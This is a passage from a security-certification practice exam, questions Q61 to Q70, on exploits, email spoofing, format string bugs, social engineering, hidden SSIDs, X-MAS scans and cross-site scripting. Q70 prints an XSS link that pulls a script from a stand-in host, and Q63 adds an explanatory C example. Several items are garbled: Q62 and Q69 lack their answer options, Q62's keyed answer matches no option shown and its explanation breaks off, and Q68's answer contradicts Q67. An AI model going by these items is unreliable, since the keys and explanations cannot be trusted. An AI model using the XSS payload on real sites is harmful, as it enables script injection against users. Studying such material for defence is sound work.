Q61. In the following example, which of these is the "exploit"? 

Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites. 

Select the best answer. 

A. Microsoft Corporation is the exploit. 

B. The security "hole" in the product is the exploit. 

C. Windows 2003 Server 

D. The exploit is the hacker that would use this vulnerability. 

E. The documented method of how to use the vulnerability to gain unprivileged access. 



Microsoft is not the exploit, but if Microsoft documents how the vulnerability can be used to gain unprivileged access, they are creating the exploit. If they just say that there is a hole in the product, then it is only a vulnerability. The security "hole" in the product is called the "vulnerability". It is documented in a way that shows how to use the vulnerability to gain unprivileged access, and it then becomes an "exploit". In the example given, Windows 2003 Server is the TOE (Target of Evaluation). A TOE is an IT System, product or component that requires security evaluation or is being identified. The hacker that would use this vulnerability is exploiting it, but the hacker is not the exploit. The documented method of how to use the vulnerability to gain unprivileged access is the correct answer. 

Q62. The following is an email header. What address is that of the true originator of the message?

Return-Path: <bgates@microsoft.com> 

Received: from smtp.com (fw.emumail.com []. 

by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807

for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500 

Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000

Received: from ([]. 

by smtp.com with SMTP 

Received: from unknown (HELO CHRISLAPTOP. ( 

by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 

From: "Bill Gates" <bgates@microsoft.com> 

To: "mikeg" <mikeg@thesolutionfirm.com> 

Subject: We need your help! 

Date: Fri, 8 Aug 2003 19:12:28 -0400 

Message-ID: <> 

MIME-Version: 1.0 

Content-Type: multipart/mixed; 


X-Priority: 3 (Normal)

X-MSMail-Priority: Normal 

X-Mailer: Microsoft Outlook, Build 10.0.2627 

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 

Importance: Normal 





E. 8.10.2/8.10.2 

Answer: C

Explanation: Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address is the true source of the 

Q63. Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf("%s", str). What attack will his program expose the web application to?

A. Cross Site Scripting 

B. SQL injection Attack 

C. Format String Attack 

D. Unicode Traversal Attack 

Answer: C

Explanation: Format string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * . 
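The contrast described in this explanation, as an added example that is not part of the original question set: the hardened call keeps the format constant so user text is only data, and a small scanner reports which tokens in untrusted input a printf-family function would treat as directives. The function names `render_safe` and `count_directives` and the sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable form from the question (left as a comment so it is never run):
 *     printf(str);        // str is user-controlled and becomes the format
 * Hardened form: the format is a constant and str is passed only as data. */
int render_safe(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* Scan untrusted text the way a printf-family parser would and count what it
 * would treat as conversion directives. "%%" is a literal percent sign.
 * *writes is set to 1 if a %n (write-back) directive is present. */
int count_directives(const char *s, int *writes)
{
    int count = 0;
    *writes = 0;
    while (*s) {
        if (*s != '%') { s++; continue; }
        s++;
        if (*s == '%') { s++; continue; }      /* literal percent */
        /* skip flags, width, precision, '$' and length modifiers */
        while (*s && strchr("-+ #0123456789.*$hlLqjzt'", *s)) s++;
        if (*s == '\0') break;                  /* dangling '%' at end */
        count++;
        if (*s == 'n') *writes = 1;
        s++;
    }
    return count;
}

int main(void)
{
    /* Constructed sample inputs */
    const char *inputs[] = { "hello", "100%% sure", "%x.%x.%s", "%08x%n" };
    char buf[64];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int w, d = count_directives(inputs[i], &w);
        render_safe(buf, sizeof buf, inputs[i]);
        printf("safe output: %-12s directives: %d  %%n present: %d\n", buf, d, w);
    }
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` makes GCC and Clang warn about the commented-out form at build time.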

Q64. Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it can’t mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?

A. Bob can explain that using a weak key management technique is a form of programming error 

B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error 

C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique 

D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error 

Answer: C

Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security. 

Q65. What are the six types of social engineering? (Choose six.)

A. Spoofing 

B. Reciprocation 

C. Social Validation 

D. Commitment 

E. Friendship 

F. Scarcity 

G. Authority 

H. Accountability 

Answer: BCDEFG

Explanation: All social engineering is performed by taking advantage of human nature. For in-depth information on the subject, read Robert Cialdini's book, Influence: Science and Practice.

Q66. You are footprinting Acme.com to gather competitive intelligence. You visit the acme.com website for contact information and telephone numbers but do not find them listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated?

A. Visit google search engine and view the cached copy. 

B. Visit Archive.org site to retrieve the Internet archive of the acme website. 

C. Crawl the entire website and store them into your computer. 

D. Visit the company’s partners and customers website for this information. 

Answer: B

Explanation: The Internet Archive (IA) is a non-profit organization dedicated to maintaining an archive of Web and multimedia resources. Located at the Presidio in San Francisco, California, this archive includes "snapshots of the World Wide Web" (archived copies of pages, taken at various points in time), software, movies, books, and audio recordings (including recordings of live concerts from bands that allow it). This site is found at www.archive.org. 

Q67. Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT department of his company installed a wireless network throughout the building. The problem is that they are only going to make it available to upper management and the IT department.

Most employees don't have a problem with this since they have no need for wireless networking, but Jeffery would really like to use wireless since he has a personal laptop that he works from as much as he can. Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless networks available. After about an hour of trying to figure it out, Jeffery cannot get on the company's wireless network. Discouraged, Jeffery leaves the office and goes home. 

The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT department might have turned off SSID broadcasting, and that is why he could not see any wireless networks. How would Jeffery access the wireless network?

A. Run WEPCrack tool and brute force the SSID hashes 

B. Jam the wireless signal by launching denial of service attack 

C. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext 

D. Attempt to connect using wireless device default SSIDs 

Answer: C

Q68. In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. 

Why do you think this is possible? 

A. Bob forgot to turn off DHCP. 

B. All access points are shipped with a default SSID. 

C. The SSID is still sent inside both client and AP packets. 

D. Bob’s solution only works in ad-hoc mode. 

Answer: B

Explanation: All access points are shipped with a default SSID unique to that manufacturer; for example, 3Com uses the default SSID comcomcom.

Q69. What is the proper response for an X-MAS scan if the port is closed?






F. No response 


Explanation: Closed ports respond to an X-MAS scan with a RST.

Q70. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A